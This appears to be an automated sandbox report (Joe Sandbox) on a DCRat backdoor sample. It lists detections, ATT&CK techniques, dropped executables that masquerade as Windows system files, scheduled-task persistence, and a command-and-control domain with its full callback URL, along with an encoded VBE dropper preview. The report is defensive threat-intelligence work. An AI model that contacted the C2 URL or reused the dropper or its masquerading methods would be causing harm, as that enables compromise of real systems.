Source: Yara match	File source: 00000016.00000002.2214669811.0000000003328000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2214484394.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2214661372.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2159872323.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2214669811.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2109875192.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2215363217.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2214661372.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2214448921.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2213895639.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Runtimemonitor.exe PID: 5860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ihpxTeRPVLYTpFZNVeq.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 6656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ihpxTeRPVLYTpFZNVeq.exe PID: 1532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ihpxTeRPVLYTpFZNVeq.exe PID: 320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smartscreen.exe PID: 1276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smartscreen.exe PID: 6768, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000014.00000002.2214484394.00000000023A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2109875192.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2214669811.0000000003328000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2214484394.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2214661372.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2159872323.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2214669811.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2109875192.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2215363217.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2214661372.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2214448921.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2213895639.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Runtimemonitor.exe PID: 5860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ihpxTeRPVLYTpFZNVeq.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 6656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ihpxTeRPVLYTpFZNVeq.exe PID: 1532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ihpxTeRPVLYTpFZNVeq.exe PID: 320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smartscreen.exe PID: 1276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smartscreen.exe PID: 6768, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	122 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Scripting	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Software Packing	DCSync	37 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
QoRXFaE8Xn.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.Uztuby
QoRXFaE8Xn.exe	100%	Avira	VBS/Runner.VPG
QoRXFaE8Xn.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\PortcomAgentwinbroker\Runtimemonitor.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	100%	Avira	HEUR/AGEN.1323984
C:\Recovery\dasHost.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	100%	Avira	HEUR/AGEN.1323984
C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe	100%	Avira	VBS/Runner.VPG
C:\PortcomAgentwinbroker\Runtimemonitor.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	100%	Joe Sandbox ML
C:\Recovery\dasHost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	100%	Joe Sandbox ML
C:\PortcomAgentwinbroker\Runtimemonitor.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\dasHost.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://dragon-rp.com	100%	Avira URL Cloud	malware
http://dragon-rp.com/	100%	Avira URL Cloud	malware
http://dragon-rp.com/L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238	100%	Avira URL Cloud	malware
http://dragon-rp.com/L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238935c1031b2c1aa4e736=b01c62c75854535ad755531ad6f347a7&e7e185b24f1d9f944fc8872c063e4284=QYwQTM1MjZmhTOxQjZzY2NlVGO3cTMzMGOjRDO2EDMhZDO5IjN4QjZ&bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dragon-rp.com	188.114.96.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://dragon-rp.com/L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238935c1031b2c1aa4e736=b01c62c75854535ad755531ad6f347a7&e7e185b24f1d9f944fc8872c063e4284=QYwQTM1MjZmhTOxQjZzY2NlVGO3cTMzMGOjRDO2EDMhZDO5IjN4QjZ&bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://dragon-rp.com	ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BD3000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://dragon-rp.com/L1nc0In.php?bG6OwCDUgwB9=yvwJF&n6hn8gtvqWCY2EUQ04HECWECc=BK1iHDRq&52e1a0438c238	ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BD3000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Runtimemonitor.exe, 00000005.00000002.2109875192.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dragon-rp.com/	ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BD3000.00000004.00000800.00020000.00000000.sdmp, ihpxTeRPVLYTpFZNVeq.exe, 00000012.00000002.2159872323.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://go.mic	dasHost.exe, 00000014.00000002.2212408044.0000000000781000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	dragon-rp.com	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585574
Start date and time:	2025-01-07 21:01:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QoRXFaE8Xn.exe renamed because original name is a hash value
Original Sample Name:	08e95dabb86201eeb98188769e4fcd62.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@29/15@1/1
EGA Information:	Successful, ratio: 11.1%
HCA Information:	Successful, ratio: 75% Number of executed functions: 483 Number of non-executed functions: 94
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Runtimemonitor.exe, PID 5860 because it is empty
Execution Graph export aborted for target dasHost.exe, PID 1436 because it is empty
Execution Graph export aborted for target dasHost.exe, PID 6656 because it is empty
Execution Graph export aborted for target ihpxTeRPVLYTpFZNVeq.exe, PID 1488 because it is empty
Execution Graph export aborted for target ihpxTeRPVLYTpFZNVeq.exe, PID 1532 because it is empty
Execution Graph export aborted for target ihpxTeRPVLYTpFZNVeq.exe, PID 320 because it is empty
Execution Graph export aborted for target smartscreen.exe, PID 1276 because it is empty
Execution Graph export aborted for target smartscreen.exe, PID 6768 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: QoRXFaE8Xn.exe

Simulations

Behavior and APIs

Time	Type	Description
15:02:08	API Interceptor	3x Sleep call for process: ihpxTeRPVLYTpFZNVeq.exe modified
21:02:04	Task Scheduler	Run new task: dasHost path: "C:\Recovery\dasHost.exe"
21:02:05	Task Scheduler	Run new task: dasHostd path: "C:\Recovery\dasHost.exe"
21:02:05	Task Scheduler	Run new task: ihpxTeRPVLYTpFZNVeq path: "C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe"
21:02:05	Task Scheduler	Run new task: ihpxTeRPVLYTpFZNVeqi path: "C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe"
21:02:05	Task Scheduler	Run new task: smartscreen path: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe"
21:02:05	Task Scheduler	Run new task: smartscreens path: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://pozaweclip.upnana.com/	Get hash	malicious	Unknown	Browse	104.18.11.207
	https://us01-i-prod-estimating-storage.s3.amazonaws.com/598134325679181/562949954787293/Documents/1706942/Hoosier%20Crane%20Service%20Company.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428	Get hash	malicious	Unknown	Browse	104.17.223.152
	http://xyft.zmdusdxj.ru	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t	Get hash	malicious	Unknown	Browse	104.17.25.14
	Globalfoundries eCHECK- Payment Advice.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	01-06-2025 Docu.invpd (1).pdf	Get hash	malicious	HTMLPhisher	Browse	172.67.179.163
	https://creditunions.taplink.ws	Get hash	malicious	HTMLPhisher	Browse	172.67.74.23
	https://temp.farenheit.net/XZ1ZEKzFsR0pndUdHTEgydlg4dElJdnYwT0hjRkpzdVVSUm1ub0VGNFQ3Y0ZmKzFxM3I2dUJxaTkwbXEvV1dSWUM0MG5LUitrcGV2THJ0Q2o4cWUvRGxkd1l4MmcySE41YUtFUHo4RzZXM014SWRPampra2ZwMVVWNGhFTGh4WW9NU3BQaCtFRUFTMXdkc2ZiNUdhS284ek8xMTVuaS9UdExEa3lOT2hoa3R4SGg1bFIra241ZE02M1pDRVdDWVN2U3QraDRvZEVVOUMyM1J1Y1pHbGJiZ2Y1b1c4TGIxakFzVWhuc0E9PS0td2twbkU5Q0xKY3VWbzc3Ny0tQW5QTkZPazI2ajU5aTJUSjlRQkZtZz09?cid=2308276481	Get hash	malicious	KnowBe4	Browse	104.17.249.203

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\PortcomAgentwinbroker\1uTBfrpLb993XlgcpIpPee79uOtZ.bat

Download File

Process:	C:\Users\user\Desktop\QoRXFaE8Xn.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	45
Entropy (8bit):	4.142318519591885
Encrypted:	false
SSDEEP:	3:I5wIkCAN3KOAZWSXL4i:ITkCIVrkki
MD5:	045087EFD61D5AB94D918BFD3946A335
SHA1:	3AFF3CFA40D70469614E4228D91A606C83EA7919
SHA-256:	E482A83AF3F1DFC25DC04F86B454E21D1107CC9CF5CD18C172C3E3F3B9A3B022
SHA-512:	047D93B004FE7EE1448EB274EE640D104AAC06C00D5EA2ACDD56B78581D610E93A702E9098D33C985CAE2758B3CC502331747FA0979A075AA5C39A30F7910D49
Malicious:	false
Preview:	"C:\PortcomAgentwinbroker\Runtimemonitor.exe"

C:\PortcomAgentwinbroker\Runtimemonitor.exe

Download File

Process:	C:\Users\user\Desktop\QoRXFaE8Xn.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847872
Entropy (8bit):	6.0854906854128545
Encrypted:	false
SSDEEP:	12288:APwJ9nE3RrtCPdRUpg6w/nUc+mQozYhUZObmlVxQbq5K8nMq7:l9E3RrEdapg6gnUcKnbXq5Qc
MD5:	2EFFCBFE83A6E643D620BD7221B8D4CC
SHA1:	37BA35E898BC1135C3BE15127D1BAF95EA311029
SHA-256:	4618A1F497B813EF1F58A9A256BBD0F418C70EC7340CE9E0A51E343D21095B40
SHA-512:	0DCC2FEBDF5AD2C5F5BDA5680BDE51B23EA5D5EA38BDC6BC8DDA0D2F0A0AE9C4A619B9A7AABD024DA9C45F4DF594766D400ABD4DF07EE30FC4A2869DA77D6999
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe

Download File

Process:	C:\Users\user\Desktop\QoRXFaE8Xn.exe
File Type:	data
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.792981701568858
Encrypted:	false
SSDEEP:	6:GFtkvwqK+NkLzWbHhE18nZNDd3RL1wQJRWi83sXy6qIOn0I3VW7:GFFMCzWLy14d3XBJTUs0o
MD5:	965FE1CEE13F15BD288F9F8D603A2769
SHA1:	18CA01B1EE9A9B524CA5AAA1B750C38A1303F7C1
SHA-256:	B6FF2BE9587C1E05B35823470A835D0DEA7850FF2ED98E57722489DB44033A8B
SHA-512:	364A403217A76567C96632741C3F0473A09AF1185ACFF65926AAFEE1655DF5D9F6161F2799D57F6D432E7F87A0AC592CD6AD7F6424C89EAC12F793B27D4E9D72
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^yQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJnGMY1W:zo.UYSkU4MWVnMzF!PA6Dwd81,2(^o^w(2h+nGO;rD} 8mYJS~Z~~0msk+70AAAA==^#~@.

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\2afe4ed40d5a86

Download File

Process:	C:\PortcomAgentwinbroker\Runtimemonitor.exe
File Type:	ASCII text, with very long lines (346), with no line terminators
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.838292367194404
Encrypted:	false
SSDEEP:	6:cJoi0QsvsQ8/jcIvtsWmucAJrVu7gvTWyZa/FyfcvSM12A5vHjY6IO8iOs8aAYj:cJRVL7rtsWmTCrVoqTvZa/w0J1h5bJYU
MD5:	95CF884D4CEB13D9A64324670CF0AF12
SHA1:	D961873D94A4DCE277EE8EE0D6CBC0551C48CCFD
SHA-256:	A4C90EE4DC32D4DDE2FA3B0424FD930F93FEAE146B3D4F06CAEBB50E9DAF3A6B
SHA-512:	846F0EA943AC8E5128E98FCB8A45D98AE3413DC1E0AB51105E7F0DA5B258CC8F3D6EFDFDCBF45374B5693992051A93497A3D3072A9DF319FF839B03CFD28F62B
Malicious:	false
Preview:	mIotLzDg4TLNJeaK4b8vaxG6tgqWRCrBIzbdN4cRu1PQ3jpieLjIm94zBs9oJrO2lJETD6798rBji0CK1H2GciZJ4mbf4yIDmXoteVfhOjK58VRLpzxByIZDu5ZafbEJi76KMSpgmU13YeKjUQzFBGPd8l9j6EBwfAWBYG9XJRYdRgoQuzFPl9IbsdMkSGjhSEXXIJKOQb5usvMb6tzG8wKf24S53YFDr0KMIRHkp18KDYt7RvnjQdjg32fN0PU2W2D1kATplObHyAcdKVoIufwNRoSQv4tagGxKV2WRb88CCcr3ZBDfkLH0Fzj5rD4reBksNRIS9XrwhuLz6Z0u0OzU97

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe

Download File

Process:	C:\PortcomAgentwinbroker\Runtimemonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847872
Entropy (8bit):	6.0854906854128545
Encrypted:	false
SSDEEP:	12288:APwJ9nE3RrtCPdRUpg6w/nUc+mQozYhUZObmlVxQbq5K8nMq7:l9E3RrEdapg6gnUcKnbXq5Qc
MD5:	2EFFCBFE83A6E643D620BD7221B8D4CC
SHA1:	37BA35E898BC1135C3BE15127D1BAF95EA311029
SHA-256:	4618A1F497B813EF1F58A9A256BBD0F418C70EC7340CE9E0A51E343D21095B40
SHA-512:	0DCC2FEBDF5AD2C5F5BDA5680BDE51B23EA5D5EA38BDC6BC8DDA0D2F0A0AE9C4A619B9A7AABD024DA9C45F4DF594766D400ABD4DF07EE30FC4A2869DA77D6999
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Windows NT\TableTextService\ca1d63bd2d464f

Download File

Process:	C:\PortcomAgentwinbroker\Runtimemonitor.exe
File Type:	ASCII text, with very long lines (713), with no line terminators
Category:	dropped
Size (bytes):	713
Entropy (8bit):	5.880441052263757
Encrypted:	false
SSDEEP:	12:rHdejdBSSBJCpHiCDWiiRNnF7p/2Fo5BSqmhG9kX+vxKoRTzHiSOdtgigk:zde5BSSfKi+iRpFZQ8iuk
MD5:	17EA6E7744CB575871570BF999FBF8FE
SHA1:	041D13D5DBA27328A157A74D625E6472036F562F
SHA-256:	4C86732806F2E3B8F1798A8E39001A275BD9B2067585C6C07B1AB3627CAB6D6D
SHA-512:	04236507416DB19F6B08F4CC8CF36E5FD7C4FE09F67710CFE3AD342000B3B500540597ED2BF2389ABCF2C101960FC613FE05F055D586D097CCF580AB12D38314
Malicious:	false
Preview:	VXMhAt0bKjxRJVj3sw159978gMB9FbJANcii6tx9erNAA6BlfYrg5wsVZOBys1WtawEqxB6982bRw78jLZdrtmFbuMIss8QnVdjN2UyebrhCUbicQbnSXp9yrm6k2NR9my6TXur0l8PBECHSoqcQV8PqdvfPYOlNahaffPFftwrZZ7tofn5MvAonjPzlPbcWXBlgmlxYk7gjR0QgB0uvSZca3w6PadPSUUBXWNC4zglxdEVt9SkZrqD8jKmzpi8HrOO6y2Jyy05wxo6yaNPH30knRDyLkMOQieGP0Z5GJvk1vRK4OyZbT1N0olpuD7OllpNSiq8BSI7IQt29347wxx7qRPlPtKDLh8PFD2WhzXJK3Fk4sp0JAbyyshBSFtSHFwkRdw6BhZ6ZnwwMpqgDT4LFKbXg0EbGFCFHeTb6tzlkfZL5uzmYMOxLkeHBYaKd70UkrprVPkTeSkkuQcvBbD30P4g9MZhTpHmoEkOFIRJm4S294Wv6oIC47dUwIrJ0CAyL85qpNp3J3Q66BgF0nkogErrlQb7aHTj4eqB8qGt8P2BqhYullTMbVSGQOEZvscCkrBcUfGKh1pRMqBE2rVyyGHjMkuulr7Qw0b8f5ZGfJpkpB4kMAhEWnOdjcQuuVi04ZeVPCj6RPTpbh3KpKhlJ23Im7YCppVJkzpPgiVKbkxHUjCCiFEky7qBgVtRngRl4KEm1o

C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe

Download File

Process:	C:\PortcomAgentwinbroker\Runtimemonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847872
Entropy (8bit):	6.0854906854128545
Encrypted:	false
SSDEEP:	12288:APwJ9nE3RrtCPdRUpg6w/nUc+mQozYhUZObmlVxQbq5K8nMq7:l9E3RrEdapg6gnUcKnbXq5Qc
MD5:	2EFFCBFE83A6E643D620BD7221B8D4CC
SHA1:	37BA35E898BC1135C3BE15127D1BAF95EA311029
SHA-256:	4618A1F497B813EF1F58A9A256BBD0F418C70EC7340CE9E0A51E343D21095B40
SHA-512:	0DCC2FEBDF5AD2C5F5BDA5680BDE51B23EA5D5EA38BDC6BC8DDA0D2F0A0AE9C4A619B9A7AABD024DA9C45F4DF594766D400ABD4DF07EE30FC4A2869DA77D6999
Malicious:	true
